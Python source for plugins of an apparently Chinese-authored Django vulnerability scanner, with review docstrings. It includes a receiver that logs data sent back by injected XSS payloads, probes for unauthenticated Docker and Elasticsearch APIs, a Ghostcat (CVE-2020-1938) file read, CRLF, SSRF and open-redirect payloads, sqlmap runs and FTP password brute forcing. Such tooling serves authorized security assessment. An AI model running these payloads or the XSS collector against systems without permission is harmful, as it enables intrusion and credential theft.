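def xss_prey(request):
    """Record a callback from an XSS payload and notify via WeChat.

    Stores the caller's IP, the ``domain`` query parameter, the User-Agent
    and the full (URL-decoded) request path as an ``XssPrey`` row, then
    sends a WeChat notification.  The view always answers
    ``{"status":"ok"}`` so the calling page gets a well-formed JSON reply;
    persistence or notification failures are logged at CRITICAL and do not
    change the response.

    Args:
        request: Django ``HttpRequest``.

    Returns:
        ``HttpResponse`` with a JSON body and ``application/json`` type.
    """
    meta = request.META
    # X-Forwarded-For is supplied by the client/proxy chain and is not
    # validated here, so the recorded ``ip`` is informational only.  Fall
    # back to REMOTE_ADDR; only a *missing* key yields the sentinel (the
    # original bare ``except:`` also swallowed KeyboardInterrupt/SystemExit).
    ip = meta.get('HTTP_X_FORWARDED_FOR')
    if ip is None:
        ip = meta.get('REMOTE_ADDR', '0.0.0.0')

    # The original ran ``.replace("'", "\'")`` on these values; in Python
    # ``"\'"`` is just ``'``, so that was a no-op and has been dropped.  The
    # ORM parameterises the values below, so no manual quoting is needed.
    domain = request.GET.get('domain', 'Unknown')
    user_agent = meta.get('HTTP_USER_AGENT', 'Unknown')
    full_path = unquote(request.get_full_path())

    logger.debug(full_path)
    # The model field is called ``cookie`` but it receives the decoded
    # request path (the payload's data travels in the URL).
    cookie = full_path
    logger.info(cookie)
    try:
        XssPrey.objects.update_or_create(domain=domain,
                                         user_agent=user_agent,
                                         cookie=cookie,
                                         ip=ip)

        title = '发现XSS猎物'
        content = domain

        wechat.send_msg(title, content)
    except Exception as e:
        # Best effort: the callback must still get a 200 reply.
        logger.critical(e)

    return HttpResponse('{"status":"ok"}', content_type='application/json')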
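def start(**kwargs):
    """Probe Docker-labelled ports for an unauthenticated Remote API.

    Connects to every ``Port`` whose service name contains ``docker``,
    sends a plain ``GET /containers/json`` and treats a reply that carries
    ``HTTP/1.1 200 OK``, ``Docker`` and ``Api-Version`` as an unauthorised
    daemon.  Matches are stored as a ``Risk`` keyed by the target IP and
    announced via WeChat.  Per-host errors are logged and do not stop the
    sweep.

    Args:
        **kwargs: must contain ``policy`` (read for parity with the other
            plugins; it does not alter the query here).
    """
    policy = kwargs['policy']  # required key; not used by this plugin

    socket.setdefaulttimeout(2)
    ports = Port.objects.filter(service_name__icontains='docker')
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    for port in ports:
        port_num = port.port_num
        ip = port.asset.ip

        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))

        try:
            # The context manager closes the socket on every path; the
            # original left one descriptor open per probed host.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((ip, port_num))
                payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (
                    ip, port_num)
                # sendall() retries partial writes; send() may stop early.
                s.sendall(payload.encode())
                # Only the first 1024 bytes are inspected; a marker beyond
                # that would be missed (unchanged from the original).
                recv = s.recv(1024)
            if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv:
                logger.info(
                    '%-30s%-30s' %
                    ('[$$$]success, ', "[True], this host is vulnerable"))
                desc = 'Docker未授权访问漏洞,获取到如下信息:\n' + str(recv)
                Risk.objects.update_or_create(target=ip,
                                              risk_type='docker未授权访问',
                                              defaults={'desc': desc})
                title = 'docker未授权访问'
                content = desc
                wechat.send_msg(title, content)
        except Exception as e:
            logger.error(e)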
def start(**kwargs):
    """Check Tomcat AJP ports (8009) on the given assets for CVE-2020-1938.

    For each ``Port`` with ``port_num == 8009`` belonging to
    ``kwargs['assets']`` one request is issued through the ``Tomcat``
    helper; a decoded response containing ``web-app`` is recorded as a
    ``Risk`` of type ``cve-2020-1938`` and announced via WeChat.  Per-host
    errors are logged and the sweep continues.

    Args:
        **kwargs: ``policy`` (read but unused here) and ``assets``, the
            asset ids used in the ``asset_id__in`` filter.
    """
    policy = kwargs['policy']  # read for parity with the other plugins; unused
    assets = kwargs['assets']
    socket.setdefaulttimeout(2)
    ports = Port.objects.filter(asset_id__in=assets, port_num=8009)

    for port in ports:
        port_num = port.port_num
        ip = port.asset.ip

        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
        try:
            t = Tomcat(ip, port_num)
            # NOTE(review): the path below is a plain string, not an f-string,
            # so the literal text ``{".jsp" if args.rce else ""}`` is sent as
            # part of the URI (``args`` is not defined in this scope either).
            # Looks like a leftover from a CLI script; confirm the intended path.
            _, data = t.perform_request('/hissec{".jsp" if args.rce else ""}', attributes=[
                {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
            ])
            logger.info('----------------------------')
            # ``data`` is assumed to be an iterable of chunks with a bytes
            # ``.data`` attribute — TODO confirm against the Tomcat helper.
            res = ''.join([d.data.decode('utf_8') for d in data])
            if "web-app" in res:
                logger.info('%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable"))
                desc = 'cve-2020-1938 漏洞,获取到如下信息:\n' + str(res)
                Risk.objects.update_or_create(port=port, asset=port.asset, risk_type='cve-2020-1938', defaults={'desc': desc})
                title = '发现cve-2020-1938漏洞'
                content = desc
                wechat.send_msg(title, content)
        except Exception as e:
            logger.error(e)

    logger.info('-' * 75)
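def start(**kwargs):
    """Check Elasticsearch ports (9200) for anonymous access to ``/_cat``.

    Each port is tried over ``http`` and ``https``; a reply whose body
    mentions ``/_cat/master`` is stored as a ``Risk`` keyed by the URL and
    announced via WeChat.  With ``policy == 'full'`` every 9200 port is
    visited, otherwise ports already marked by this plugin in ``scanned``
    are skipped.  Per-URL errors are logged; every port is marked scanned.

    Args:
        **kwargs: must contain ``policy``.
    """
    policy = kwargs['policy']
    # NOTE: the two branches spell the port once as a str and once as an
    # int; Django coerces both, but they should be kept identical.
    if policy == 'full':
        ports = Port.objects.filter(port_num='9200')
    else:
        ports = Port.objects.exclude(scanned__icontains=plugin).filter(
            port_num=9200)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    protocols = ['http', 'https']
    for port in ports:
        ip = port.asset.ip
        for protocol in protocols:
            try:
                url = '%s://%s:%s/_cat' % (protocol, ip, port.port_num)

                logger.debug("[%s] [%s] %s" % (plugin, port.id, url))
                # Bounded wait: without a timeout a silently dropped
                # connection would hang the whole sweep on one host.
                response = requests.get(url, timeout=10)
                if "/_cat/master" in response.text:
                    logger.info('[$$$]success, 可以匿名访问')
                    Risk.objects.update_or_create(
                        target=url,
                        risk_type='elasticsearch匿名访问',
                        defaults={'desc': 'elasticsearch匿名访问, ' + url})
                    logger.info("[True], this host is vulnerable")
                    title = 'elasticsearch匿名访问'
                    content = url
                    wechat.send_msg(title, content)
            except Exception as e:
                logger.error(e)
        update_scan_status(port, plugin)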
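def check(obj):
    """Test one target for CRLF (HTTP header) injection.

    Each entry of the module-level ``payloads`` is tried twice: appended to
    the target URL, then inside an ``x-request-id`` request header.  A
    response that carries a ``dandh811`` header (presumably the marker the
    payloads inject — confirm against ``payloads``) is recorded as a
    ``Risk`` of type ``CRLF注入`` and announced via WeChat.  Bare-IP
    targets are skipped.  ``obj`` is marked scanned at the end regardless
    of outcome.

    Args:
        obj: a model instance with an ``id`` and either a ``url`` attribute
            or a ``subdomain`` (the latter gets a trailing ``/``).
    """
    try:
        url = obj.url
    except AttributeError:
        url = obj.subdomain + '/'
    if url_is_ip(url):
        return
    for payload in payloads:
        _url = url + payload
        logger.debug("[%s] [%s] %s" % (plugin, obj.id, _url))

        # Work on a copy: the original assigned ``settings.HTTP_HEADERS``
        # itself and then wrote ``x-request-id`` into it, so the injected
        # header leaked into every later request built from those settings.
        headers = dict(settings.HTTP_HEADERS)
        try:
            res = requests.get(_url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        except Exception:
            # Connection-level failure: skip the path probe, still try the header probe.
            res = None
        if res:  # a requests Response is truthy only when ``res.ok``
            try:
                # Header names are case-insensitive; ``in res.headers`` honours
                # that, whereas ``in res.headers.keys()`` compared the raw case.
                if 'dandh811' in res.headers:
                    logger.info('[$$$] %s , 该域名存在漏洞' % _url)

                    Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
                    title = '发现HTTP头注入漏洞'
                    content = _url
                    wechat.send_msg(title, content)
            except Exception as e:
                logger.critical(e)

        # Second probe: same payload carried in a request header.
        headers["x-request-id"] = 'test' + payload
        try:
            res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        except Exception:
            continue
        try:
            if 'dandh811' in res.headers:
                Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
                logger.info('success, 该域名存在漏洞')
                title = '发现HTTP头注入漏洞'
                content = _url
                wechat.send_msg(title, content)

        except Exception as e:
            logger.critical(e)

    update_scan_status(obj, plugin)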
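def start(**kwargs):
    """Run the HTTP request-smuggling check against each web app.

    With ``policy == 'increase'`` only apps not yet marked by this plugin
    in ``scanned`` are visited (newest first).  Apps whose host segment
    contains no lowercase letter (e.g. bare IPs) are skipped.  A non-empty
    result from ``HTTP_REQUEST_SMUGGLER(subdomain).run()`` is stored as a
    ``Risk`` of type ``HTTP夹带攻击`` and announced via WeChat; per-app
    errors are logged and the sweep continues.  Progress is logged after
    every app, skipped ones included.

    Args:
        **kwargs: must contain ``webapps`` (a queryset) and ``policy``.
    """
    webapps = kwargs['webapps']
    policy = kwargs['policy']
    if policy == 'increase':
        webapps = webapps.exclude(scanned__icontains=plugin).order_by('-id')
    if not webapps:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    denominator = len(webapps)
    for molecular, webapp in enumerate(webapps, start=1):
        subdomain = webapp.subdomain
        # ``subdomain`` is expected to look like ``scheme://host[:port]``;
        # the segment after the first ':' is tested for letters so that
        # bare-IP targets are skipped.  A value without ':' used to raise
        # IndexError and abort the whole sweep; now it is skipped as well.
        parts = subdomain.split(':')
        if len(parts) < 2 or not re.search('[a-z]', parts[1]):
            continue
        logger.info('-' * 75)
        logger.debug("[%s] [%s] %s" % (plugin, webapp.id, subdomain))

        try:
            res = HTTP_REQUEST_SMUGGLER(subdomain).run()
            if res:
                logger.info(res)
                Risk.objects.update_or_create(target=subdomain, risk_type='HTTP夹带攻击', defaults={'desc': res})
                title = '发现漏洞'
                content = "漏洞类型:" + plugin
                wechat.send_msg(title, content)
        except Exception as e:
            logger.critical(e)

        # Single progress line; the last item is reported as exactly 100.0.
        if molecular == denominator:
            percent = 100.0
        else:
            percent = round(1.0 * molecular / denominator * 100, 2)
        logger.warning('%s [%d/%d]' % (str(percent) + '%', molecular, denominator))

        # NOTE: the scan marker is the literal 'smuggling' while the
        # ``exclude`` above filters on ``plugin`` — keep the two equal.
        update_scan_status(webapp, 'smuggling')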
def start(**kwargs):
    """Probe URL parameters that look like fetch/redirect targets.

    Every stored ``WebUrls`` row containing ``?`` is visited (all rows for
    ``policy == 'full'``, otherwise only those not yet marked by this plugin
    in ``scanned``, newest first).  When the URL starts with one of the
    known parameter names, the parameter value is replaced by
    ``http://127.0.0.1:22`` and the page is fetched without following
    redirects; a body containing ``mismatch`` is stored as a ``Risk`` of
    type ``plugin`` and announced via WeChat.  The row is marked scanned
    after a successful request; request errors are logged at CRITICAL.

    Args:
        **kwargs: must contain ``policy``.
    """
    policy = kwargs['policy']

    candidates = WebUrls.objects.filter(url__contains='?')
    if policy != 'full':
        candidates = candidates.exclude(scanned__icontains=plugin)
    weburls = candidates.order_by('-id')

    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
        return

    parameter_names = [
        'share', 'wap', 'url', 'link', 'src', 'source', 'target', 'u', '3g',
        'display', 'sourceURl', 'imageURL', 'domain'
    ]
    # Only a parameter that directly follows '?' is matched.
    markers = ['?%s=' % name for name in parameter_names]

    for weburl in weburls:
        original = weburl.url
        for marker in markers:
            if marker not in original:
                continue
            prefix, _, _ = original.partition(marker)
            url = prefix + marker + 'http://127.0.0.1:22'
            logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
            try:
                response = requests.get(
                    url, timeout=10, verify=False, allow_redirects=False)
                body = response.content.decode('utf-8')

                if 'mismatch' in body:
                    logger.info(body)
                    logger.info('[$$$] success, 发现%s漏洞' % url)
                    Risk.objects.update_or_create(target=url,
                                                  risk_type=plugin,
                                                  defaults={'desc': url})

                    wechat.send_msg('发现%s漏洞' % plugin, '-')
                update_scan_status(weburl, plugin)
            except Exception as e:
                logger.critical(e)
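def start(**kwargs):
    """Run ``sqlmap`` against every stored URL that carries a query string.

    ``policy == 'full'`` rescans everything; any other policy skips rows
    already marked ``sqli`` in ``scanned``.  A non-empty ``sqlmap`` result
    is stored as a ``Risk`` of type ``SQL注入`` and announced via WeChat.
    Errors for one URL are logged and the sweep continues; progress is
    logged after each URL.

    Args:
        **kwargs: must contain ``policy``.
    """
    policy = kwargs['policy']
    queryset = WebUrls.objects.filter(url__contains='?')
    if policy != 'full':
        # NOTE: the marker is the literal 'sqli', not ``plugin``; keep the
        # two in sync if the plugin is renamed.
        queryset = queryset.exclude(scanned__icontains='sqli')
    weburls = queryset.order_by('-id')

    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
        return
    denominator = len(weburls)
    for molecular, weburl in enumerate(weburls, start=1):
        url = weburl.url
        logger.info('-' * 75)
        logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
        try:
            # Inside the try so that a failure of the sqlmap wrapper itself is
            # logged like any other per-URL error instead of aborting the sweep.
            data = sqlmap(url)
            if data:
                logger.info(data)
                logger.info('[$$$]success, 发现SQL注入漏洞')
                Risk.objects.update_or_create(target=url, risk_type='SQL注入', defaults={'desc': data})

                title = '发现SQL注入漏洞'
                content = '-'
                wechat.send_msg(title, content)
            else:
                logger.info('未发现漏洞')
            update_scan_status(weburl, 'sqli')
        except Exception as e:
            logger.info('* %s' % e)

        # Single progress line; the last item is reported as exactly 100.0.
        if molecular == denominator:
            percent = 100.0
        else:
            percent = round(1.0 * molecular / denominator * 100, 2)
        logger.info('进度: %s [%d/%d]' % (str(percent) + '%', molecular, denominator))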
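def start(**kwargs):
    """Run the external ``phuip-fpizdam`` checker against PHP web apps.

    Only apps whose ``other_info`` mentions ``php/`` are visited; with
    ``policy == 'increase'`` those already marked by this plugin in
    ``scanned`` are skipped.  The tool's stdout is logged and, when it
    contains ``success``, a ``Risk`` of type ``php漏洞`` is stored and a
    WeChat message sent.  Every visited app is marked scanned.

    Args:
        **kwargs: must contain ``policy`` and ``webapps`` (a queryset).
    """
    policy = kwargs['policy']
    webapps = kwargs['webapps'].filter(other_info__icontains='php/')
    if policy == 'increase':
        webapps = webapps.exclude(scanned__icontains=plugin)

    if not webapps:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    for webapp in webapps:
        url = webapp.subdomain

        logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
        # argv form with no shell: ``url`` is discovered data, so a shell
        # metacharacter inside it is passed literally instead of being
        # interpreted (the original built a ``shell=True`` command string).
        argv = ['/root/go/bin/phuip-fpizdam', '%s/index.php' % url]
        cmd = ' '.join(argv)  # human-readable form for the log and the Risk record
        logger.info(cmd)
        try:
            proc = subprocess.run(argv,
                                  stdin=subprocess.DEVNULL,
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE)
        except OSError as e:
            # e.g. binary missing: with shell=True this only showed up as
            # text on stderr, so keep the sweep going the same way.
            logger.error(e)
            out, err = '', ''
        else:
            out = proc.stdout.decode('utf-8')
            err = proc.stderr.decode('utf-8')
        logger.info(out)
        logger.error(err)
        if 'success' in out:
            Risk.objects.update_or_create(target=url,
                                          risk_type='php漏洞',
                                          defaults={'desc': cmd})

            logger.info('[$$$]success')
            title = '发现漏洞'
            content = plugin
            wechat.send_msg(title, content)
        update_scan_status(webapp, plugin)
        logger.info('-' * 75)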
def start(**kwargs):
    """Look for open redirects in stored URLs and web-app roots using headless Chrome.

    Pass 1 walks ``WebUrls`` (all rows for ``policy == 'full'``, otherwise
    those not yet marked by this plugin) and, for every query parameter
    whose name is in ``keywords``, substitutes each entry of ``payloads``
    and checks whether the browser ends up on a ``www.baidu`` URL.  Pass 2
    appends each entry of ``payloads2`` to every web app's ``subdomain``
    and checks the same way.  Hits are stored as ``Risk`` rows of type
    ``开放重定向`` and announced via WeChat; the first hit per target stops
    further payloads for it.  A fresh Chrome driver is started per target
    and ``pkill chrome`` is run after each one.

    Args:
        **kwargs: must contain ``webapps`` (a queryset) and ``policy``.
    """
    webapps = kwargs['webapps']
    policy = kwargs['policy']
    # Query-parameter names that commonly carry a redirect target.
    keywords = [
        'next', 'url', 'return', 'redirect_url', 'callback_url', 'callback',
        'r', 'target', 'error', 'errurl', 'error_url', 'redirect',
        'redirect_to', 'jump', 'jump_to', 'to', 'link', 'linkto', 'domain',
        'u', 'continue', 'back_url'
    ]
    # Values substituted for the parameter; a hit is a final URL on www.baidu.
    # NOTE(review): ``'https://[email protected]'`` looks like a page-extraction
    # artefact (e-mail obfuscation) rather than the author's literal — verify.
    payloads = [
        r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com',
        '////baidu.com', 'https://[email protected]', '#baidu.com',
        '?baidu.com', r'\\baidu.com', '.baidu', '.baidu.com',
        '///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
    ]
    chrome_options = Options()

    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--headless')
    chrome_options.add_argument('--disable-dev-shm-usage')
    if policy == 'full':
        weburls = WebUrls.objects.order_by('-id')
    else:
        weburls = WebUrls.objects.exclude(scanned__icontains=plugin)
        webapps = webapps.exclude(scanned__icontains=plugin)

    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    for weburl in weburls:
        url = parse.unquote(weburl.url, 'utf-8')

        if url_is_ip(url):
            continue
        logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))

        try:
            # NOTE(review): ``executable_path`` / ``chrome_options`` are the
            # legacy Selenium keyword names; newer versions use ``service`` /
            # ``options`` — confirm the pinned Selenium version.
            browser = webdriver.Chrome(
                executable_path='/opt/tools/chromedriver',
                chrome_options=chrome_options)
        except Exception as e:
            logger.critical(e)
            continue
        risk = False  # set once a payload hits; skips the remaining parameters

        parseResult = parse.urlparse(url)
        param_dict = parse.parse_qs(parseResult.query)

        for param in param_dict.keys():

            if param not in keywords:
                continue
            if risk:
                continue

            for payload in payloads:
                # Only the first value of a repeated parameter is replaced.
                _url = url.replace(param + '=' + param_dict[param][0],
                                   param + '=' + payload)
                # NOTE(review): both the debug line and ``browser.get`` below use
                # ``url`` (the original), not the ``_url`` just built, so the
                # substituted value is never actually loaded in this pass —
                # confirm whether ``_url`` was intended.
                logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
                try:
                    browser.get(url)
                    cur_url = browser.current_url
                    # close() discards the current window; presumably later
                    # get() calls on this driver then fail and land in the
                    # ``except`` below, which silently moves to the next payload.
                    browser.close()
                except Exception as e:
                    continue

                if 'www.baidu' in cur_url:
                    logger.info('[$$$] success, 发现漏洞')
                    Risk.objects.update_or_create(target=url,
                                                  risk_type='开放重定向',
                                                  defaults={"desc": _url})

                    title = '发现开放重定向漏洞'
                    content = '-'
                    wechat.send_msg(title, content)
                    risk = True
        try:
            # NOTE(review): this kills every Chrome process on the host, not just
            # the driver started above; other jobs sharing the machine are affected.
            subprocess.call('pkill chrome', shell=True)
        except Exception as e:
            logger.critical(e)
        finally:
            browser.quit()
        update_scan_status(weburl, plugin)

    if not webapps:
        logger.debug("[%s] %s" % (plugin, 'There are no objects to scan'))
    # Suffixes appended directly to the web-app root for pass 2.
    payloads2 = [
        r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com',
        '////baidu.com', '#baidu.com', '?baidu.com', r'\\baidu.com',
        '///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
    ]
    for webapp in webapps:
        try:
            browser = webdriver.Chrome(
                executable_path='/opt/tools/chromedriver',
                chrome_options=chrome_options)
        except Exception as e:
            logger.critical(e)
            continue
        risk = False
        for payload in payloads2:
            if risk:
                continue
            url = webapp.subdomain + payload
            logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
            try:
                browser.get(url)
                cur_url = browser.current_url
                browser.close()
            except Exception as e:
                # A failed load is treated as a miss (the sentinel never matches).
                cur_url = 'error'
            if 'www.baidu' in cur_url:
                logger.info('[$$$] success, 发现漏洞')
                Risk.objects.update_or_create(target=url,
                                              risk_type='开放重定向',
                                              defaults={"desc": url})

                title = '发现开放重定向漏洞'
                content = url
                wechat.send_msg(title, content)
                risk = True
        try:
            update_scan_status(webapp, plugin)
            # See the note in pass 1: this is host-wide, not driver-specific.
            subprocess.call('pkill chrome', shell=True)
        except Exception as e:
            logger.critical(e)
        finally:
            browser.quit()
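def start(**kwargs):
    """Banner-probe ports whose service name matches ``plugin``.

    Sends the literal ``success`` to each port and records a ``Risk`` when
    the reply contains ``Environment``.  With any policy other than
    ``'full'`` ports already marked by this plugin in ``scanned`` are
    skipped.  One WeChat notification is sent at the end if anything was
    found; per-host errors are logged and the sweep continues.

    NOTE(review): the stored risk is labelled zabbix (``zabbix漏洞`` /
    ``zabbix未授权访问``) while the notification says zookeeper
    (``发现zookeeper漏洞``).  One of the two is a copy-paste leftover —
    confirm which service this plugin is for before renaming either.
    Also, nothing here calls ``update_scan_status``, so the ``exclude``
    branch only takes effect if another component marks the port.

    Args:
        **kwargs: must contain ``policy``.
    """
    policy = kwargs['policy']
    ports = Port.objects.filter(service_name__icontains=plugin)
    if policy != 'full':
        ports = ports.exclude(scanned__icontains=plugin)

    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    has_risk = False

    for port in ports:
        ip = port.asset.ip

        try:
            logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
            socket.setdefaulttimeout(10)
            # The context manager closes the socket on every path; the
            # original left one descriptor open per probed host.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((ip, port.port_num))
                # sendall() retries partial writes; send() may stop early.
                s.sendall("success".encode('utf-8'))
                result = s.recv(1024).decode('utf-8')
            if "Environment" in result:
                logger.info('+ Found Vul: \033[0;32m %s, %s\033[0m' %
                            (ip, str(port.port_num)))

                desc = 'zabbix未授权访问'
                Risk.objects.update_or_create(target=port.asset.ip,
                                              risk_type='zabbix漏洞',
                                              defaults={'desc': desc})
                has_risk = True
            # (Commented-out redis INFO / AUTH code inherited from the plugin
            # this one was copied from has been removed; it was never executed.)
        except Exception as e:
            logger.error(e)

    if has_risk:
        title = '风险提示'
        content = "发现zookeeper漏洞"
        wechat.send_msg(title, content)

    logger.info('-' * 100)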
def get_reports(result, webapp):
    # Fetch the report for this scan_id once the AWVS scan has finished.
    """Wait for an AWVS scan to finish, download its report and record high-severity findings.

    Polls ``get_status(result)`` every 10 s until the scan is ``completed``
    (``aborted`` just returns).  On completion it asks the AWVS API for a
    *Developer* report of the scan, polls until the report offers a
    download, writes it to ``<BASE_DIR>/files/reports/<scan_id>.html`` and
    stores that relative path on ``webapp.report``.  Severity-3
    vulnerabilities belonging to the scan's target (minus ``ignore_vuls``)
    are then collected into one ``Risk`` row (type ``awvs扫描漏洞``) and
    announced via WeChat; ``webapp`` is saved at the end.

    NOTE(review): the two ``sys.exit()`` calls terminate the *calling
    process* on an API or download failure instead of returning, so a
    worker looping over many targets dies on the first one.  Both
    ``while True`` loops are unbounded.  Every API call passes
    ``verify=False`` (TLS certificate of the AWVS host is not checked).

    Report template ids (from the original note; only Developer is used):
        11111111-1111-1111-1111-111111111111    Developer
        21111111-1111-1111-1111-111111111111    XML
        11111111-1111-1111-1111-111111111119    OWASP Top 10 2013
        11111111-1111-1111-1111-111111111112    Quick

    Args:
        result: dict with ``target.address``, ``scan_id`` and ``target_id``.
        webapp: model instance whose ``report`` (and, on findings, ``risk``)
            fields are set before ``save()``.
    """
    url = result['target']['address']  # read but not used below
    count = 0  # unused
    while True:
        time.sleep(10)
        # ``res`` first holds the status string, later the report JSON dict.
        res = get_status(result)
        if res == 'completed':
            scan_id = result['scan_id']
            target_id = result['target_id']
            data = {"template_id": "11111111-1111-1111-1111-111111111111",
                    "source": {"list_type": "scans", "id_list": [scan_id]}}
            try:
                response = requests.post(host + "api/v1/reports", data=json.dumps(data), headers=api_header, timeout=30,
                                         verify=False)
                scan_result = response.headers
                # The API answers with the report's URL in a Location header.
                loc = scan_result['Location']
            except Exception as e:
                logger.info('* %s' % e)
                sys.exit()
            logger.info('+ %s 扫描完成,正在生成报告 ...' % (time.strftime("%H:%M:%S")))
            while True:
                time.sleep(3)
                try:
                    response = requests.get(host.strip('/') + loc, headers=api_header, timeout=30, verify=False)
                    res = json.loads(response.content.decode('utf-8'))
                    # Loop until the report exposes at least one download link.
                    if res['download']:
                        break
                except Exception as e:
                    logger.info(e)
            logger.info('+ %s 报告生成完毕,下载中 ...' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
            try:
                report_download_url = res['download'][0]
                report_response = requests.get(host.strip('/') + report_download_url, headers=api_header, timeout=30, verify=False)
                report_path_ = '/files/reports/' + scan_id + '.html'
                logger.info('+ 报告存储路径: %s' % report_path_)

                # Plain concatenation: assumes BASE_DIR has no trailing '/'.
                report_path = settings.BASE_DIR + report_path_
                with open(report_path, 'wb') as f:
                    f.write(report_response.content)
            except Exception as e:
                logger.info('* %s' % e)
                sys.exit()
            webapp.report = report_path_

            try:
                response = requests.get(host + 'api/v1/vulnerabilities?q=severity:3', headers=api_header, timeout=30, verify=False)
                res = json.loads(response.content.decode('utf-8'))
                vul_names = []
                ignore_vuls = ['nginx Integer Overflow']
                # The endpoint is not filtered by target, so match target_id here.
                for vul in res['vulnerabilities']:
                    if vul['target_id'] == target_id and vul['vt_name'] not in ignore_vuls:
                        vul_names.append(vul['vt_name'])

                if vul_names:
                    for vul_name in vul_names:
                        logger.info('--- %s' % vul_name)
                    desc = '\n'.join(vul_names)
                    # update_or_create returns (instance, created).
                    risk = Risk.objects.update_or_create(target=webapp.subdomain, risk_type='awvs扫描漏洞', defaults={'desc': desc})
                    webapp.risk = risk[0]
                    title = 'awvs扫描漏洞'
                    content = desc
                    wechat.send_msg(title, content)
                else:
                    logger.info('+ 未发现高风险漏洞')

            except Exception as e:
                logger.info('* %s' % e)

            webapp.save()
            logger.info('+ %s 报告已保存' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
            break
        if res == 'aborted':
            break
def start(**kwargs):
    """Check FTP ports for anonymous login and for credentials from the brute lists.

    Ports whose service name matches ``plugin`` are visited (with any
    policy other than ``'full'`` those already marked by this plugin are
    skipped).  For each port: connect; on failure the ``Port`` row is
    deleted; otherwise try an empty login and then every username/password
    pair from ``brute/usernames.txt`` and ``brute/passwords.txt`` under
    ``settings.BASE_DIR``.  Successes are stored as ``Risk`` rows
    (``ftp匿名登录`` / ``ftp弱口令``); the latter is also announced via
    WeChat.  Every port that connected is marked scanned.

    NOTE(review): ``port.delete()`` runs on *any* connect exception, including
    a transient timeout, so a momentarily unreachable host loses its record
    permanently.  A single ``ftplib.FTP`` instance is reused for every host
    and never ``quit()``; a failed login does not reset the connection, so
    later attempts may run on a stale session — confirm against ftplib.

    Args:
        **kwargs: must contain ``policy``.
    """
    policy = kwargs['policy']
    if policy == 'full':
        ports = Port.objects.filter(service_name__icontains=plugin)
    else:
        ports = Port.objects.exclude(scanned__icontains=plugin).filter(
            service_name__icontains=plugin)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    # Plain concatenation: assumes BASE_DIR ends with '/'.  No encoding is
    # given, so the platform default is used when reading the word lists.
    with open(settings.BASE_DIR + 'brute/usernames.txt', 'r') as f:
        usernames = f.readlines()
    with open(settings.BASE_DIR + 'brute/passwords.txt', 'r') as f:
        passwords = f.readlines()

    ftp = ftplib.FTP()
    for port in ports:
        ip = port.asset.ip

        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))

        try:
            ftp.connect(ip, port.port_num, timeout=5)
            logger.info('ftp端口可以连接')
        except Exception as e:
            logger.error(e)
            # Destructive on a transient failure — see the note in the docstring.
            port.delete()
            logger.info('FTP端口连接失败,删除端口')
            continue
        try:
            # Empty user/password = anonymous login; on success the host is
            # recorded and the credential lists are not tried.
            ftp.login('', '')
            logger.info('[$$$] FTP登录成功!')
            Risk.objects.update_or_create(target=ip,
                                          risk_type='ftp匿名登录',
                                          defaults={
                                              'target': ip,  # duplicates the lookup key; harmless
                                              'desc': 'ftp匿名登录'
                                          })
            continue
        except Exception as e:
            logger.error(e)

        for username in usernames:
            username = username.strip()  # readlines() keeps the newline
            for password in passwords:
                password = password.strip()
                try:
                    # logger.debug(username + ':' + password)
                    ftp.login(username, password)

                    logger.info('[$$$] FTP登录成功!')
                    logger.info('[$$$]success,  %s:%s' % (username, password))
                    Risk.objects.update_or_create(
                        target=ip,
                        risk_type='ftp弱口令',
                        defaults={'desc': '%s:%s' % (username, password)})

                    title = 'ftp弱口令'
                    content = '-'
                    wechat.send_msg(title, content)
                except Exception as e:
                    # Any login failure is ignored; the loop keeps going even
                    # after a success (no break), so later pairs overwrite
                    # the same Risk row.
                    # logger.info(e)
                    pass
        update_scan_status(port, plugin)

        logger.info('-' * 75)